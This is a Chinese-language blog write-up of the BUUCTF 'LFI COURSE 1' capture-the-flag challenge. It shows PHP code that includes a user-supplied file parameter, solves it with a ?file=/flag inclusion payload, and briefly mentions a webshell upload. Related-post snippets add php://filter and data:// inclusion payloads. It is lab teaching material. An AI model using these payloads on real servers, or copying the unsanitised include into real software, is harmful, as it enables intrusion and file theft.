[BUUCTF][PHP本地文件包含]LFI COURSE 1

最新推荐文章于 2024-06-01 12:50:49 发布
最新推荐文章于 2024-06-01 12:50:49 发布
阅读量4.8k 收藏 1
点赞数
分类专栏: CTF题解 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Terran1ight/article/details/123366303
版权 
<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/7/9
 * Time: 7:07 AM
 */

highlight_file(__FILE__);

if(isset($_GET['file'])) {
    $str = $_GET['file'];

    include $_GET['file'];
}

点进去后就上面一段PHP代码审计,根据不断的百度翻译各种函数的意思,觉得应该是本地文件包含

看了别人的writeup,一共两种方法

方法一

构造 ?file=/flag
http://7e80a547-7234-43fd-9a21-97d1d4a4f174.node4.buuoj.cn:81/?file=/flag

最后


flag{a75f7e3d-6bff-4f52-8fb4-ca41887c20ec}

方法二

上传一句话木马,菜刀链接,明天再写具体的

「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU LFI COURSE 1-1
fdmssmf的博客
08-05 2908
BUU LFI COURSE 1 1 直接url后面添加/?file=/flag
BUUCTF BUU LFI COURSE 1
oJiuJieZhong的博客
10-11 962
这是一道本地文件包含的题 输入 ?file=/flag 即可看到flag http://c241d62f-732c-46d3-b45a-f3390d0411af.node4.buuoj.cn:81/?file=/flag
BUUCTF练习记录10:BUU LFI COURSE 1 1
qq_44396970的博客
05-07 354
出现include,这道题为php包含漏洞方面,传递参数file。发现需要传入路径和名称,到根目录下寻找flag,得到答案。
BUU LFI COURSE 1
Sk1y的博客
08-23 1506
考察点:文件包含,get传参
BUUCTF】BUU LFI COURSE 1 1
qq_41369524的博客
12-06 1149
尝试退到根目录去寻找flag,也就是四次…可以看到有include,判断是文件包含漏洞。用的是get传参,且参数为file。发现需要传入一个路径才能行。
渗透测试技术之本地文件包含
02-01
通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在...
toxin:LFI(本地文件包含)漏洞利用工具
05-30
Toxin 是一个 LFI(本地文件包含)/日志污染利用工具。 介绍 Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会...
LFI本地包含漏洞介绍php
03-24
LFI本地包含漏洞介绍php的 这个是最新的2011年最新公布的。
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
LFI包含本地文件) 进攻简介 下面是纯bb,了解过的跳过这部分; 解释:LFI是能够打开并包含本地文件的漏洞; 这里区别一下RFI,远程文件包含突破; 实际上:文件包含漏洞是“代码注入”的一种,包含即执行,可干的...
[BUUCTF]-Basic-BUU LFI COURSE 1
yzl_007的博客
08-27 1195
[BUUCTF]-Basic-BUU LFI COURSE 1 打开地址 简单的文件包含 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } paylo
CTF题 BUUCTF之[极客大挑战 2019]Knife 1
weixin_44632787的博客
06-17 3169
CTF题 BUUCTF之[极客大挑战 2019]Knife 1 启动我们的挑战项目 这里的题目简直就是在提示我们用中国菜刀连接,但是由于个人习惯这里我就用中国蚁剑来连接了。(其实中国蚁剑和中国菜刀的功能差不多,不过个人感觉蚁剑更好用一些吧)。 现在来打开我们的蚁剑工具 然后填上我们的连接和密码:Syc 然后进入到对方的登录后台 最后到这个后台的根目录下就可以找到flag值 如果你不能一下子就看出来是用蚁剑这些工具来连接,那可能是因为你做题的经验还不够。做多了自然而然就能想到了。总的来说,这题属于
BUUCTF n1book [第二章 web进阶]文件上传
nareku的博客
07-02 2330
花了一天多才搭好docker的环境,然后再来写这道只能说自己的环境也太香啦 不过这道题也花了一点点点时间琢磨打开题目,发现是一如既往的文件上传界面 习惯性抓个包,界面源码已经完全暴露了,太长了这里就不放了(根据以往的经验和参考其他的师傅的wp 小小地分析了一下) 这样我们上传的文件的路径就是 upload/随机值/上传的文件名首先我们先创建一个文件(不是文件夹!!),文件后缀随便,只要文件名长度满足18即可,这就成功将后缀完全覆盖了 将文件压缩成zip 在010Edtior中打开该压缩包 修改文件
BUUCTF Basic 解题记录--BUU LFI COURSE 1
weixin_43171033的博客
09-14 934
BUUCTF Basic 解题记录--BUU LFI COURSE 1
ctfshow-web79(文件包含)
m0_62094846的博客
01-11 551
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); } 过滤了php,如果用上题的php://file怎么都解不开,可以使用data ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQg.
TP5 RSA加解密!
可爱的狼
08-06 2272
<?php /** * Created by PhpStorm. * User: zhangHong * Date: 2019/7/18 * Time: 9:54 */ namespace app\common\controller; class Encryption { private $publicKey; private $privateKey; ...
web入门-文件包含
wo41ge的博客
11-28 3260
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
【CTF Web】BUUCTF BUU LFI COURSE 1 Writeup(代码审计+PHP+文件包含漏洞)
最新发布
HEX9CF的技术博客
06-01 539
1点击启动靶机。
BUUCTF之easy_tornado】
qq_40646572的博客
05-15 891
打开题目网站,发现存在三个文件,都打开看了下,在hint.txt文件中发现提示。 在flag.txt文件中也有提示flag在/fllllllllllllag文件中。 整理下思路,这道题其实关键点在于hint.txt文件中的cookie_secret值。 但考虑到题目名中包含tornado这个关键词,百度下发现这是一个python的web框架,搜索下是否存在可以读取配置文件的漏洞,发现这个框架存在可以读取配置文件的漏洞。 想到还有一个welcome.txt文件,上面提示到render,渲染。想到ss..
已知某网站存在lfi(本地文件包含),但是无法上传任何文件,针对该情况有哪些利用方
09-21
1. 获取敏感信息:利用LFI漏洞可以读取目标服务器上的本地文件,可以尝试获取敏感信息,如密码文件、配置文件、日志文件等。通过分析这些文件内容,可能找到登陆凭证、数据库连接信息、敏感数据等。 2. 执行恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值